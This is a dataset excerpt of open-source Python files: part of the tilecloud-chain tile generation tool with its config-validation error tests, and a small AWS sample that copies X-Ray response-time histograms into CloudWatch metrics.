layer[\"grid\"]),\n params=params,\n ),\n ),\n headers=layer[\"headers\"],\n ),\n \"wms\",\n )\n elif layer[\"type\"] == \"mapnik\":\n try:\n from tilecloud.store.mapnik_ import MapnikTileStore # pylint: disable=import-outside-toplevel\n from tilecloud_chain.mapnik_ import ( # pylint: disable=import-outside-toplevel\n MapnikDropActionTileStore,\n )\n except ImportError:\n if os.environ.get(\"CI\", \"FALSE\") == \"FALSE\": # pragma nocover\n _LOGGER.error(\"Mapnik is not available\", exc_info=True)\n return None\n\n grid = config.config[\"grids\"][layer[\"grid\"]]\n if cast(str, layer.get(\"output_format\", \"png\")) == \"grid\":\n assert self.gene._count_tiles\n assert self.gene._count_tiles_dropped\n return MapnikDropActionTileStore(\n tilegrid=self.gene._gene.get_grid(config, layer[\"grid\"]),\n mapfile=layer[\"mapfile\"],\n image_buffer=layer[\"meta_buffer\"] if layer.get(\"meta\") else 0,\n data_buffer=layer.get(\"data_buffer\", 128),\n output_format=layer.get(\"output_format\", \"png\"),\n resolution=layer.get(\"resolution\", 4),\n layers_fields=layer.get(\"layers_fields\", {}),\n drop_empty_utfgrid=layer.get(\"drop_empty_utfgrid\", False),\n store=self.gene._cache_tilestore,\n queue_store=self.gene._queue_tilestore,\n count=[self.gene._count_tiles, self.gene._count_tiles_dropped],\n proj4_literal=grid[\"proj4_literal\"],\n )\n else:\n return MapnikTileStore(\n tilegrid=self.gene._gene.get_grid(config, layer[\"grid\"]),\n mapfile=layer[\"mapfile\"],\n image_buffer=layer[\"meta_buffer\"] if layer.get(\"meta\") else 0,\n data_buffer=layer.get(\"data_buffer\", 128),\n output_format=cast(str, layer.get(\"output_format\", \"png\")),\n proj4_literal=grid[\"proj4_literal\"],\n )\n return None\n\n\ndef detach() -> None:\n \"\"\"Detach to the parent process.\"\"\"\n try:\n pid = os.fork()\n if pid > 0:\n print(f\"Detached with pid {pid}.\")\n sys.stderr.write(str(pid))\n # exit parent\n sys.exit(0)\n except OSError as e:\n _LOGGER.exception(\"fork #1 failed: %d (%s)\", e.errno, e.strerror)\n sys.exit(1)\n\n\ndef main(args: Optional[List[str]] = None, out: Optional[IO[str]] = None) -> None:\n \"\"\"Run the tiles generation.\"\"\"\n try:\n parser = ArgumentParser(\n description=\"Used to generate the tiles\", prog=args[0] if 
args else sys.argv[0]\n )\n add_common_options(parser, dimensions=True)\n parser.add_argument(\n \"--get-hash\", metavar=\"TILE\", help=\"get the empty tiles hash, use the specified TILE z/x/y\"\n )\n parser.add_argument(\n \"--get-bbox\",\n metavar=\"TILE\",\n help=\"get the bbox of a tile, use the specified TILE z/x/y, or z/x/y:+n/+n for metatiles\",\n )\n parser.add_argument(\n \"--role\",\n default=\"local\",\n choices=(\"local\", \"master\", \"slave\"),\n help=\"local/master/slave, master to file the queue and slave to generate the tiles\",\n )\n parser.add_argument(\n \"--local-process-number\", default=None, help=\"The number of process that we run in parallel\"\n )\n parser.add_argument(\n \"--detach\", default=False, action=\"store_true\", help=\"run detached from the terminal\"\n )\n parser.add_argument(\n \"--daemon\", default=False, action=\"store_true\", help=\"run continuously as a daemon\"\n )\n parser.add_argument(\n \"--tiles\",\n metavar=\"FILE\",\n help=\"Generate the tiles from a tiles file, use the format z/x/y, or z/x/y:+n/+n for metatiles\",\n )\n\n options = parser.parse_args(args[1:] if args else sys.argv[1:])\n\n if options.detach:\n detach()\n\n if options.daemon and \"C2C_PROMETHEUS_PORT\" in os.environ:\n prometheus_client.start_http_server(int(os.environ[\"C2C_PROMETHEUS_PORT\"]))\n\n gene = TileGeneration(\n config_file=options.config or os.environ.get(\"TILEGENERATION_CONFIGFILE\"),\n options=options,\n multi_thread=options.get_hash is None,\n )\n\n if (\n options.get_hash is None\n and options.get_bbox is None\n and options.config is not None\n and \"authorised_user\" in gene.get_main_config().config.get(\"generation\", {})\n and gene.get_main_config().config[\"generation\"][\"authorised_user\"] != getuser()\n ):\n _LOGGER.error(\n \"not authorized, authorized user is: %s.\",\n gene.get_main_config().config[\"generation\"][\"authorised_user\"],\n )\n sys.exit(1)\n\n if options.config:\n config = gene.get_config(options.config)\n\n if options.cache is None and options.config:\n options.cache = config.config[\"generation\"][\"default_cache\"]\n\n if options.tiles is not None and options.role not in [\"local\", \"master\"]:\n _LOGGER.error(\"The --tiles option work only with role local or master\")\n sys.exit(1)\n\n try:\n generate = Generate(options, gene, out)\n if options.role == \"slave\":\n generate.gene()\n elif options.layer:\n generate.gene(options.layer)\n elif options.get_bbox:\n _LOGGER.error(\"With --get-bbox option you need to specify a layer\")\n sys.exit(1)\n elif options.get_hash:\n _LOGGER.error(\"With --get-hash option you need to specify a layer\")\n sys.exit(1)\n else:\n if options.config:\n for layer in config.config[\"generation\"].get(\n \"default_layers\", config.config[\"layers\"].keys()\n ):\n generate.gene(layer)\n except tilecloud.filter.error.TooManyErrors:\n _LOGGER.exception(\"Too many errors\")\n sys.exit(1)\n finally:\n gene.close()\n except SystemExit:\n raise\n except: # pylint: disable=bare-except\n _LOGGER.exception(\"Exit with exception\")\n if os.environ.get(\"TESTS\", \"false\").lower() == \"true\":\n raise\n sys.exit(1)\n\n\nclass HashDropperGetter:\n \"\"\"Drop th tiles based on the hash and the size.\"\"\"\n\n def __init__(self, gene: Generate, meta: bool, count: Count):\n self.gene = gene\n self.meta = meta\n self.count = count\n\n def __call__(self, config_file: str, layer_name: str) -> Callable[[Tile], Optional[Tile]]:\n \"\"\"Call.\"\"\"\n layer = 
self.gene._gene.get_config(config_file).config[\"layers\"][layer_name]\n conf_name = \"empty_metatile_detection\" if self.meta else \"empty_tile_detection\"\n if conf_name in layer:\n empty_tile = layer[\"empty_metatile_detection\"] if self.meta else layer[\"empty_tile_detection\"]\n return HashDropper(\n empty_tile[\"size\"],\n empty_tile[\"hash\"],\n store=self.gene._gene.get_tilesstore(),\n queue_store=self.gene._gene.queue_store,\n count=self.count,\n )\n return lambda tile: tile\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5803877115249634, "alphanum_fraction": 0.5820980668067932, "avg_line_length": 36.319149017333984, "blob_id": "b96e132eb2399b6d531e5e55c1db11747dfcbe83", "content_id": "b04bc43d697a71e3349c1c871f217fd8caf0e0a9", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1754, "license_type": "permissive", "max_line_length": 101, "num_lines": 47, "path": "/tilecloud_chain/mapnik_.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nfrom typing import Any, Callable, List, Optional\n\nfrom tilecloud import Tile, TileStore\nfrom tilecloud.store.mapnik_ import MapnikTileStore\n\nlogger = logging.getLogger(__name__)\n\n\nclass MapnikDropActionTileStore(MapnikTileStore):\n \"\"\"MapnikTileStore with drop action if the generated tile is empty.\"\"\"\n\n def __init__(\n self,\n store: Optional[TileStore] = None,\n queue_store: Optional[TileStore] = None,\n count: Optional[List[Callable[[Optional[Tile]], Any]]] = None,\n **kwargs: Any,\n ) -> None:\n \"\"\"Initialize.\"\"\"\n self.store = store\n self.queue_store = queue_store\n self.count = count or []\n MapnikTileStore.__init__(self, **kwargs)\n\n def get_one(self, tile: Tile) -> Optional[Tile]:\n \"\"\"See in superclass.\"\"\"\n result = MapnikTileStore.get_one(self, tile)\n if result is None:\n if self.store is not None:\n if tile.tilecoord.n != 1:\n for tilecoord in tile.tilecoord:\n self.store.delete_one(Tile(tilecoord))\n else:\n self.store.delete_one(tile)\n logger.info(\"The tile %s %s is dropped\", tile.tilecoord, tile.formated_metadata)\n if hasattr(tile, \"metatile\"):\n metatile: Tile = tile.metatile\n metatile.elapsed_togenerate -= 1 # type: ignore\n if metatile.elapsed_togenerate == 0 and self.queue_store is not None: # type: ignore\n self.queue_store.delete_one(metatile)\n elif self.queue_store is not None:\n self.queue_store.delete_one(tile)\n\n for count in self.count:\n count(None)\n return result\n" }, { "alpha_fraction": 0.6575217247009277, "alphanum_fraction": 0.6819844245910645, "avg_line_length": 77.8108139038086, "blob_id": "50acae26e68a941310893f333724a82ec456e195", "content_id": "b8dcf5a827a4f430b0aa7b78413802b90570ceb1", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17496, "license_type": "permissive", "max_line_length": 344, "num_lines": 222, "path": "/tilecloud_chain/tests/test_error.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\n\nfrom testfixtures import LogCapture\n\nfrom tilecloud_chain import controller, generate\nfrom tilecloud_chain.tests import CompareCase\n\n\nclass TestError(CompareCase):\n def setUp(self) -> None: # noqa\n self.maxDiff = None\n\n @classmethod\n def setUpClass(cls): # noqa\n os.chdir(os.path.dirname(__file__))\n\n @classmethod\n def tearDownClass(cls): # noqa\n 
os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))\n\n def test_resolution(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/wrong_resolutions.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\"tilecloud_chain\", \"ERROR\", \"The resolution 0.1 * resolution_scale 5 is not an integer.\"),\n )\n\n def test_mapnik_grid_meta(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/wrong_mapnik_grid_meta.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"The layer 'b' is of type Mapnik/Grid, that can't support matatiles.\",\n )\n )\n\n def test_type(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -v -c tilegeneration/wrong_type.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"\"\"The config file is invalid:\n-- tilegeneration/wrong_type.yaml:10:10 grids.swissgrid_2.srs: {} is not of type 'string' (rule: properties.grids.additionalProperties.properties.srs.type)\n-- tilegeneration/wrong_type.yaml:12:5 grids.swissgrid_3.srs: 'epsg:21781' does not match '^EPSG:[0-9]+$' (rule: properties.grids.additionalProperties.properties.srs.pattern)\n-- tilegeneration/wrong_type.yaml:12:5 grids.swissgrid_3: 'bbox' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:12:5 grids.swissgrid_3: 'resolutions' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:14:5 grids.swissgrid_4.srs: 'epsg21781' does not match '^EPSG:[0-9]+$' (rule: properties.grids.additionalProperties.properties.srs.pattern)\n-- tilegeneration/wrong_type.yaml:14:5 grids.swissgrid_4: 'bbox' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:14:5 grids.swissgrid_4: 'resolutions' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:15:16 grids.swissgrid_5: 'bbox' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:15:16 grids.swissgrid_5: 'resolutions' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:15:16 grids.swissgrid_5: 'srs' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:17:15 grids.swissgrid!: 'bbox' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:17:15 grids.swissgrid!: 'resolutions' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:17:15 grids.swissgrid!: 'srs' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:22:3 layers: 'hi!' does not match '^[a-zA-Z0-9_\\\\\\\\-~\\\\\\\\.]+$' (rule: properties.layers.propertyNames.pattern)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!.wmts_style: 'yo!' 
does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.0.properties.wmts_style.pattern)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!.wmts_style: 'yo!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.1.properties.wmts_style.pattern)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'extension' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'extension' is a required property (rule: properties.layers.additionalProperties.anyOf.1.required)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'grid' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'grid' is a required property (rule: properties.layers.additionalProperties.anyOf.1.required)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'layers' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'mime_type' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'mime_type' is a required property (rule: properties.layers.additionalProperties.anyOf.1.required)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'url' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_type.yaml:25:9 layers.hi!.dimensions.0.default: '2010!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.default.pattern)\n-- tilegeneration/wrong_type.yaml:25:9 layers.hi!.dimensions.0.default: '2010!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.default.pattern)\n-- tilegeneration/wrong_type.yaml:25:9 layers.hi!.dimensions.0.name: 'DATE!' does not match '^(?!(?i)(SERVICE|VERSION|REQUEST|LAYERS|STYLES|SRS|CRS|BBOX|WIDTH|HEIGHT|FORMAT|BGCOLOR|TRANSPARENT|SLD|EXCEPTIONS|SALT))[a-z0-9_\\\\\\\\-~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.name.pattern)\n-- tilegeneration/wrong_type.yaml:25:9 layers.hi!.dimensions.0.name: 'DATE!' does not match '^(?!(?i)(SERVICE|VERSION|REQUEST|LAYERS|STYLES|SRS|CRS|BBOX|WIDTH|HEIGHT|FORMAT|BGCOLOR|TRANSPARENT|SLD|EXCEPTIONS|SALT))[a-z0-9_\\\\\\\\-~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.name.pattern)\n-- tilegeneration/wrong_type.yaml:27:19 layers.hi!.dimensions.0.generate.0: '2012!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.generate.items.pattern)\n-- tilegeneration/wrong_type.yaml:27:19 layers.hi!.dimensions.0.generate.0: '2012!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.generate.items.pattern)\n-- tilegeneration/wrong_type.yaml:28:17 layers.hi!.dimensions.0.values.0: '2005!' 
does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.values.items.pattern)\n-- tilegeneration/wrong_type.yaml:28:17 layers.hi!.dimensions.0.values.0: '2005!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.values.items.pattern)\n-- tilegeneration/wrong_type.yaml:28:17 layers.hi!.dimensions.0.values.1: '2010!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.values.items.pattern)\n-- tilegeneration/wrong_type.yaml:28:17 layers.hi!.dimensions.0.values.1: '2010!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.values.items.pattern)\n-- tilegeneration/wrong_type.yaml:28:17 layers.hi!.dimensions.0.values.2: '2012!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.values.items.pattern)\n-- tilegeneration/wrong_type.yaml:28:17 layers.hi!.dimensions.0.values.2: '2012!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.values.items.pattern)\n-- tilegeneration/wrong_type.yaml:29:9 layers.hi!.dimensions.1.default: 1 is not of type 'string' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.default.type)\n-- tilegeneration/wrong_type.yaml:29:9 layers.hi!.dimensions.1.default: 1 is not of type 'string' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.default.type)\n-- tilegeneration/wrong_type.yaml:2:3 grids.swissgrid_6: None is not of type 'object' (rule: properties.grids.additionalProperties.type)\n-- tilegeneration/wrong_type.yaml:2:3 grids: 'swissgrid!' 
does not match '^[a-zA-Z0-9_\\\\\\\\-~\\\\\\\\.]+$' (rule: properties.grids.propertyNames.pattern)\n-- tilegeneration/wrong_type.yaml:31:19 layers.hi!.dimensions.1.generate.0: 1 is not of type 'string' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.generate.items.type)\n-- tilegeneration/wrong_type.yaml:31:19 layers.hi!.dimensions.1.generate.0: 1 is not of type 'string' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.generate.items.type)\n-- tilegeneration/wrong_type.yaml:32:17 layers.hi!.dimensions.1.values.0: 1 is not of type 'string' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.values.items.type)\n-- tilegeneration/wrong_type.yaml:32:17 layers.hi!.dimensions.1.values.0: 1 is not of type 'string' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.values.items.type)\n-- tilegeneration/wrong_type.yaml:3:5 grids.swissgrid_1.resolution_scale: 5.5 is not of type 'integer' (rule: properties.grids.additionalProperties.properties.resolution_scale.type)\n-- tilegeneration/wrong_type.yaml:5:11 grids.swissgrid_1.bbox.0: 'a' is not of type 'number' (rule: properties.grids.additionalProperties.properties.bbox.items.type)\n-- tilegeneration/wrong_type.yaml:5:11 grids.swissgrid_1.bbox.1: 'b' is not of type 'number' (rule: properties.grids.additionalProperties.properties.bbox.items.type)\n-- tilegeneration/wrong_type.yaml:5:11 grids.swissgrid_1.bbox.2: 'c' is not of type 'number' (rule: properties.grids.additionalProperties.properties.bbox.items.type)\n-- tilegeneration/wrong_type.yaml:6:10 grids.swissgrid_1.srs: ['EPSG:21781'] is not of type 'string' (rule: properties.grids.additionalProperties.properties.srs.type)\"\"\", # noqa\n )\n )\n\n def test_zoom_errors(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_tiles -c tilegeneration/test-nosns.yaml -l point --zoom 4,10\",\n main_func=generate.main,\n )\n log_capture.check_present(\n (\n \"tilecloud_chain\",\n \"WARNING\",\n \"zoom 10 is greater than the maximum zoom 4 of grid swissgrid_5 of layer point, ignored.\",\n ),\n (\n \"tilecloud_chain\",\n \"WARNING\",\n \"zoom 4 corresponds to resolution 5 \"\n \"is smaller than the 'min_resolution_seed' 10 of layer point, ignored.\",\n ),\n )\n\n def test_wrong_srs_auth(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/wrong_srs_auth.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"\"\"The config file is invalid:\n-- tilegeneration/wrong_srs_auth.yaml:3:5 grids.swissgrid_01.srs: 'toto:21781' does not match '^EPSG:[0-9]+$' (rule: properties.grids.additionalProperties.properties.srs.pattern)\"\"\", # noqa\n )\n )\n\n def test_wrong_srs_id(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/wrong_srs_id.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"\"\"The config file is invalid:\n-- tilegeneration/wrong_srs_id.yaml:3:5 grids.swissgrid_01.srs: 'EPSG:21781a' does not match '^EPSG:[0-9]+$' (rule: properties.grids.additionalProperties.properties.srs.pattern)\"\"\", # noqa\n )\n )\n\n def test_wrong_srs(self) -> None:\n with 
LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/wrong_srs.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"\"\"The config file is invalid:\n-- tilegeneration/wrong_srs.yaml:3:5 grids.swissgrid_01.srs: 'EPSG21781' does not match '^EPSG:[0-9]+$' (rule: properties.grids.additionalProperties.properties.srs.pattern)\"\"\",\n )\n )\n\n def test_wrong_map(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/wrong_map.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"\"\"The config file is invalid:\n-- tilegeneration/wrong_map.yaml:3:5 layers.test.empty_tile_detection: 'test' is not of type 'object' (rule: properties.layers.additionalProperties.anyOf.0.properties.empty_tile_detection.type)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test.empty_tile_detection: 'test' is not of type 'object' (rule: properties.layers.additionalProperties.anyOf.1.properties.empty_tile_detection.type)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'extension' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'extension' is a required property (rule: properties.layers.additionalProperties.anyOf.1.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'grid' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'grid' is a required property (rule: properties.layers.additionalProperties.anyOf.1.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'layers' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'mime_type' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'mime_type' is a required property (rule: properties.layers.additionalProperties.anyOf.1.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'url' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'wmts_style' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'wmts_style' is a required property (rule: properties.layers.additionalProperties.anyOf.1.required)\"\"\",\n )\n )\n\n def test_wrong_sequence(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/wrong_sequence.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"\"\"The config file is invalid:\n-- tilegeneration/wrong_sequence.yaml:3:5 grids.test.resolutions: 'test' is not of type 'array' (rule: properties.grids.additionalProperties.properties.resolutions.type)\n-- tilegeneration/wrong_sequence.yaml:3:5 grids.test: 'bbox' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_sequence.yaml:3:5 grids.test: 'srs' is a required property (rule: properties.grids.additionalProperties.required)\"\"\",\n )\n )\n" } ]
44
msysh/aws-sample-xray-responsetime-into-cloudwatch
https://github.com/msysh/aws-sample-xray-responsetime-into-cloudwatch
d87908ace240244182c8c154876087fb16415d5a
762bad6116a81319dcd15195e6a763392adb9a2a
5dc988bd6ce1dbf3194941ad22586dde0ea37ea2
refs/heads/master
2022-10-16T09:45:44.693472
2020-06-11T16:22:11
2020-06-11T16:22:11
271,546,404
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7066666483879089, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 18, "blob_id": "2a37926ded3eb4a4965635fdd642ab6fd4192d71", "content_id": "133256d54534ec4741817c6eb6dd9d13115208ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 75, "license_type": "no_license", "max_line_length": 34, "num_lines": 4, "path": "/conftest.py", "repo_name": "msysh/aws-sample-xray-responsetime-into-cloudwatch", "src_encoding": "UTF-8", "text": "import sys, os\n\nhere = os.path.abspath(\"function\")\nsys.path.insert(0, here)" }, { "alpha_fraction": 0.5983918905258179, "alphanum_fraction": 0.6026237607002258, "avg_line_length": 30.50666618347168, "blob_id": "67bebde6f447a18eaed3d19dd3b6b7a14a2fb94d", "content_id": "0aa66333363fcf074a99e908b0450a8920965b85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2363, "license_type": "no_license", "max_line_length": 87, "num_lines": 75, "path": "/function/main/app.py", "repo_name": "msysh/aws-sample-xray-responsetime-into-cloudwatch", "src_encoding": "UTF-8", "text": "import os\nimport logging\nimport time\nimport boto3\nimport botocore\n\nXRAY_GROUP_NAME = os.getenv('XRAY_GROUP_NAME', 'default')\nCW_METRICS_NAMESPACE = os.getenv('CW_METRICS_NAMESPACE', 'X-Ray/Custome Metrics')\nSAMPLIG_INTERVAL = int(os.getenv('SAMPLING_INTERVAL', '60'))\n\nlevel = logging.getLevelName(os.getenv('LOG_LEVEL', 'INFO'))\nif not isinstance(level, int):\n level = logging.INFO\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(level)\n\ncloudwatch = boto3.client('cloudwatch')\nxray = boto3.client('xray')\n\ndef get_response_time(executed_time):\n try:\n response = xray.get_service_graph(\n StartTime = executed_time - SAMPLIG_INTERVAL,\n EndTime = executed_time,\n GroupName = XRAY_GROUP_NAME\n )\n logger.debug(f\"Response : {response}\")\n except botocore.exceptions.ClientError as error:\n logger.error(f\"Error : {error}\")\n raise error\n\n return response\n\ndef put_metrics(executed_time, values, counts):\n try:\n response = cloudwatch.put_metric_data(\n Namespace = CW_METRICS_NAMESPACE,\n MetricData = [\n {\n 'MetricName': 'Response Time',\n 'Dimensions': [\n { 'Name': 'GroupName', 'Value': XRAY_GROUP_NAME }\n ],\n 'Timestamp': executed_time,\n 'Values': values,\n 'Counts': counts,\n 'Unit': 'Seconds'\n }\n ]\n )\n logger.debug(f\"Response: {response}\")\n except botocore.exceptions.ClientError as error:\n logger.error(f\"Error : {error}\")\n\n return response\n\ndef execute(executed_time):\n response_time = get_response_time(executed_time)\n\n service_client = [s for s in response_time['Services'] if s['Type'] == 'client'][0]\n edge = [e for e in service_client['Edges'] if 'ResponseTimeHistogram' in e][0]\n end_time = edge['EndTime']\n # TODO : if len(ResponseTimeHistogram) > 150\n values = [v['Value'] for v in edge['ResponseTimeHistogram']]\n counts = [v['Count'] for v in edge['ResponseTimeHistogram']]\n\n put_metrics(end_time, values, counts)\n\n\ndef lambda_handler(event, context):\n executed_time = int(time.time())\n logger.info(f\"Current time : {executed_time}\")\n logger.debug(event)\n execute(executed_time)\n" }, { "alpha_fraction": 0.7647058963775635, "alphanum_fraction": 0.7647058963775635, "avg_line_length": 22.866666793823242, "blob_id": "1076346b7ebebce115878e8fb94e8da80d5b228b", "content_id": "1ce7d39c243d99b17a0094195d6d4bd3cee6fc4c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Markdown", "length_bytes": 357, "license_type": "no_license", "max_line_length": 150, "num_lines": 15, "path": "/README.md", "repo_name": "msysh/aws-sample-xray-responsetime-into-cloudwatch", "src_encoding": "UTF-8", "text": "# AWS X-Ray response time into Amazon CloudWatch Metrics\n\nThis is a sample AWS SAM template that registers client response times traced by a specific group of AWS X-Ray as custom metrics in Amazon CloudWatch.\n\n## Build\n\n```\nsam build --parameter-overrides \"ParameterKey=XRayGroupName,ParameterValue=XRayGroupName\"\n```\n\n## Deploy\n\n```\nsam deploy --guided\n```" } ]
3
mao-liu/bricklayer
https://github.com/mao-liu/bricklayer
193b565c988f44edac5bf7091455af96155d3fe4
4cb0ede9b9b7cd7f48ea992c054ac411213b4649
f00ced0f7a3f3391162bda298abe9aae6cee7b5b
refs/heads/master
2023-07-15T10:51:41.991363
2021-08-20T01:06:41
2021-08-20T01:06:41
null
0
0
null
null
null
null
null
